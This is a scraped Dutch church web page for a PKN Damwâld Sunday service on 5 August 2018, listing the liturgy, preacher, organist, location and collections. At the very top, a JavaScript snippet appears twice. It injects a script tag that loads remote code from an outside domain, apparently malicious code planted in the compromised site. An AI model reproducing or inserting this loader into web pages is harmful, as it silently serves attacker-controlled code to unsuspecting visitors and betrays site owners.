;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 5 augustus 2018 11:00 uur - PKN Damwâld
zondag 5 augustus 2018
11:00 uur

Kerkdienst zondag 5 augustus 2018 11:00 uur

Informatie

Voorganger:Dhr. T.R.A. Simonides, Birdaard
Organist:Jaap van der Horn
Liturgie
lied voor de dienst : ELB. 218 : 1 , 2 en 3
Welkom
Aanvangslied : psalm 33 : 1 en 2
Stil gebed , Bemoediging en groet
Gebed om een zegen
We zingen: psalm 33 : 8
Woord bij zondag 5 augustus .
Moment van inkeer
We zingen: ELB. lied 302 : 1 , 2, 3 en 4
De Tien leefregels en gedicht .
We zingen: ELB. lied 37 : 1 en 3
Gebed voor de opening van het Woord
We lezen: 2 Samuël 6 : 12 – 19
We zingen: ELB. Lied 37 : 8
We lezen: Lucas 14 : 12 – 21
We zingen: psalm 150 : 1
Overdenking .
We zingen: gezang 479 : 1 en 3
Dankzegging en gebeden
Collecte
We zingen: gezang 479 : 4
Gedicht om mee te nemen in de zomertijd
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: Dorcas Hulp en Ontwikkeling

Dorcas is een Internationale Christelijke organisatie voor ontwikkelingssamenwerking, sociale hulp, noodhulp en wederopbouw. Dorcas zet zich in om de opdracht van Jezus Christus te vervullen: zorgen voor de armen en verdrukten (Mattheüs 25: 31-46). Zij doen dit door hen in staat te stellen hun positie in de samenleving te versterken en hun zelfredzaamheid te vergroten en door het bieden van sociale zorg en het verlenen van hulp in noodsituaties. Zij steunen de allerarmsten ongeacht hun ras, religie, geslacht of politieke overtuiging.

Tweede collecte: Kerk
Uitganscollecte: Kerk